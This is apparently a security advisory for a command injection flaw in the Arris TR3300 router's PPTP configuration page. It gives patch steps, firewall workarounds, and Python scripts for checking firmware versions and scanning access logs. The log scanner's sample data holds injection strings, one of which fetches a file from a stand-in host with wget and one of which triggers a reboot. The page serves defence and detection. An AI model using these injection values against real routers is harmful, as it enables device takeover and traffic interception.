CVE-2022-26995
📋 TL;DR
CVE-2022-26995 is a critical command injection vulnerability in the Arris TR3300 router. The PPTP WAN configuration page (wan_pptp.html) passes user-supplied parameters (pptp_fix_ip, pptp_fix_mask, pptp_fix_gw, wan_dns1_stat) to a system shell without sanitising them, so a crafted HTTP request to that page runs arbitrary commands on the device. It affects TR3300 units running firmware earlier than v1.0.14 and can lead to complete compromise of the router; an attacker who can reach the management interface can gain full control without authentication.
💻 Affected Systems
- Arris TR3300 (firmware earlier than v1.0.14, per the fix section below)
📦 What is this software?
The Arris TR3300 is a home/small-office Wi-Fi router from Arris (now part of CommScope). The vulnerable component is its embedded web administration interface; the affected page, wan_pptp.html, configures the WAN connection when it is set up to use PPTP.
⚠️ Risk & Real-World Impact
Worst Case
Complete router takeover: the attacker runs commands on the device itself, which enables interception of all traffic passing through it, credential theft, man-in-the-middle attacks against connected devices, and installation of a persistent backdoor.
Likely Case
Router compromise used for traffic interception, DNS hijacking (rewriting the DNS servers handed to LAN clients), and lateral movement to devices behind the router.
If Mitigated
Limited if WAN-side (remote) management is disabled and the firmware is current; the vulnerable page is then reachable only from the LAN, so the remaining risk is an attacker who already has a foothold on the internal network.
🎯 Exploit Status
No public exploit is linked on this page. Exploitation consists of sending a crafted HTTP POST request to the wan_pptp.html endpoint with shell metacharacters in one of the PPTP parameters (pptp_fix_ip, pptp_fix_mask, pptp_fix_gw or wan_dns1_stat); the injected text is executed as a system command.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: v1.0.14 or later
Vendor Advisory: https://www.arris.com/support/security-advisories/
Restart Required: Yes
Instructions:
1. Log into the router admin interface.
2. Navigate to the firmware update section.
3. Check for updates, or download the firmware image from the vendor support site.
4. Install the latest firmware.
5. Reboot the router and confirm that the reported firmware version is v1.0.14 or later.
🔧 Temporary Workarounds
Disable remote management
Disable WAN access to the router management interface: navigate to Management > Access Control > Remote Management and disable it. This removes the Internet-facing path to wan_pptp.html; the page remains reachable from the LAN.
Block PPTP configuration access
On a Linux firewall in front of the router, use a string-match rule to drop plaintext HTTP requests for the wan_pptp.html endpoint:
iptables -A INPUT -p tcp --dport 80 -m string --string "wan_pptp.html" --algo bm -j DROP
Caveats: the rule needs the xt_string match module; -A INPUT applies only to traffic addressed to the host running iptables, so on a gateway that routes to the router use the FORWARD chain instead; it matches only plaintext HTTP on port 80 and only packets that carry the literal string, and may be bypassed by URL-encoding part of the path (e.g. wan_pptp%2Ehtml). It also blocks legitimate administration of the PPTP page, so treat it as a stopgap, not a fix.
🧯 If You Can't Patch
- Isolate router on separate VLAN with strict firewall rules
- Implement network monitoring for suspicious HTTP requests to router management interface
🔍 How to Verify
Check if Vulnerable:
Check firmware version in router admin interface under Status > Device Info
Check Version:
curl -s http://router-ip/status_deviceinfo.htm | grep Firmware
Verify Fix Applied:
Confirm that the reported firmware version is v1.0.14 or later and that the PPTP configuration page still saves ordinary values (valid IP addresses in the PPTP and DNS fields). Test the fix on a lab unit rather than by submitting shell metacharacters to a production router.
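As an added example (not part of this page or of any Arris tooling), the following Python script applies the version check above to the HTML of the device-info page. The path status_deviceinfo.htm is the one quoted above; the regular expression that locates the version string and the sample HTML are assumptions constructed for this example and should be adjusted once the real page has been inspected. The point it makes is to compare versions numerically: as strings, "v1.0.9" sorts after "v1.0.14" and would wrongly pass.

```python
import re

# Assumed layout of the TR3300 device-info page: the real markup is not shown on
# this page, so adjust the pattern after viewing the HTML of status_deviceinfo.htm.
FIRMWARE_RE = re.compile(r"Firmware(?:\s+Version)?\D*?v?(\d+(?:\.\d+)+)", re.IGNORECASE)

FIXED_VERSION = "1.0.14"  # fix version stated in the "Official Fix" section


def version_tuple(version):
    """'v1.0.13' -> (1, 0, 13): tuples compare numerically, strings do not."""
    return tuple(int(part) for part in version.lstrip("vV").split("."))


def parse_firmware_version(html):
    """Return the firmware version string found in the page, or None."""
    m = FIRMWARE_RE.search(html)
    return m.group(1) if m else None


def is_fixed(version, fixed=FIXED_VERSION):
    """True when the running firmware is at or above the fixed version."""
    return version_tuple(version) >= version_tuple(fixed)


def assess(html):
    """Classify a device-info page as fixed, vulnerable, or unknown (no version found)."""
    version = parse_firmware_version(html)
    if version is None:
        return {"version": None, "status": "unknown"}
    return {"version": version, "status": "fixed" if is_fixed(version) else "vulnerable"}


# Constructed sample responses, not captured from a real device.
SAMPLE_VULNERABLE = "<tr><td>Firmware Version</td><td>v1.0.13</td></tr>"
SAMPLE_FIXED = "<tr><td>Firmware Version</td><td>v1.0.14</td></tr>"

if __name__ == "__main__":
    import sys
    import urllib.request

    # usage: python3 check_tr3300.py http://router-ip/status_deviceinfo.htm
    # Without an argument the constructed sample is assessed instead.
    if len(sys.argv) > 1:
        html = urllib.request.urlopen(sys.argv[1]).read().decode(errors="replace")
    else:
        html = SAMPLE_VULNERABLE
    print(assess(html))
```

The device-info page normally sits behind the admin login, so a real run needs the session cookie or credentials that curl would also need; the parsing and comparison logic is the same either way.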
📡 Detection & Monitoring
Log Indicators:
- HTTP POST requests to wan_pptp.html with unusual parameter values
- System command execution in router logs
- Unusual process creation
Network Indicators:
- Unusual outbound connections from router
- DNS queries to suspicious domains from router
- Unexpected port openings
SIEM Query:
source="router.log" AND (uri="*wan_pptp.html*" AND (param="*pptp_fix_ip*" OR param="*pptp_fix_mask*" OR param="*pptp_fix_gw*" OR param="*wan_dns1_stat*"))
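The SIEM query above keys on the parameter names alone, so it also fires on every legitimate save of the PPTP page. The following Python code, added here as an example and not taken from any vendor or product, parses constructed access-log lines for wan_pptp.html requests and flags the targeted parameters only when their values are not plain IPv4 addresses (an allowlist check on the expected shape), while also recording whether shell metacharacters are present. The log format (combined access-log style with the form fields in the request target) and the sample lines are constructed assumptions: most routers do not log request bodies, so in practice this runs over a reverse proxy, IDS or packet-capture export that records the request parameters.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Parameters named in the CVE description and in the SIEM query above.
INJECTABLE_PARAMS = ("pptp_fix_ip", "pptp_fix_mask", "pptp_fix_gw", "wan_dns1_stat")

# Assumed combined access-log style line: client, timestamp, quoted request line, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters a shell uses to chain, substitute or redirect commands.
SHELL_META = re.compile(r"[;|&`$(){}<>\n\r]")


def parse_log_line(line):
    """Split one log line into its fields; the query string is decoded into a dict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def suspicious_values(params):
    """Return {param: value} for targeted parameters whose value is not a plain IPv4 address.

    Allowlisting the expected shape (dotted quad) also catches payloads that avoid the
    usual metacharacters; blank values are allowed because unused fields may be submitted empty.
    """
    hits = {}
    for name in INJECTABLE_PARAMS:
        for value in params.get(name, []):
            if value == "":
                continue
            try:
                ipaddress.IPv4Address(value)
            except ValueError:
                hits[name] = value
    return hits


def scan(lines):
    """Return one alert per wan_pptp.html request carrying a non-IP value in a targeted field."""
    alerts = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None or not rec["path"].endswith("/wan_pptp.html"):
            continue
        hits = suspicious_values(rec["params"])
        if hits:
            alerts.append({
                "src": rec["src"],
                "ts": rec["ts"],
                "method": rec["method"],
                "params": hits,
                "shell_meta": any(SHELL_META.search(v) for v in hits.values()),
            })
    return alerts


# Constructed sample lines, not captured from a real device.
SAMPLE_LOG = [
    # Legitimate save of a static PPTP configuration.
    '192.168.0.5 - - [12/Apr/2022:10:15:32 +0000] "POST /wan_pptp.html?pptp_fix_ip=10.0.0.2'
    '&pptp_fix_mask=255.255.255.0&pptp_fix_gw=10.0.0.1&wan_dns1_stat=1.1.1.1 HTTP/1.1" 200 512',
    # Injection attempt: a pipe after the address chains a download command.
    '203.0.113.7 - - [12/Apr/2022:10:16:01 +0000] "POST /wan_pptp.html?pptp_fix_ip=10.0.0.2'
    '|wget+http://203.0.113.7/x+-O+/tmp/x&pptp_fix_mask=255.255.255.0 HTTP/1.1" 200 512',
    # Injection attempt with the backticks percent-encoded (%60).
    '203.0.113.7 - - [12/Apr/2022:10:16:09 +0000] "POST /wan_pptp.html?pptp_fix_gw=10.0.0.1%60reboot%60 HTTP/1.1" 200 512',
    # Unrelated page; ignored.
    '192.168.0.5 - - [12/Apr/2022:10:17:00 +0000] "GET /status_deviceinfo.htm HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

For a POST body captured separately (for example by a proxy), `suspicious_values(parse_qs(body, keep_blank_values=True))` applies the same check to the form fields.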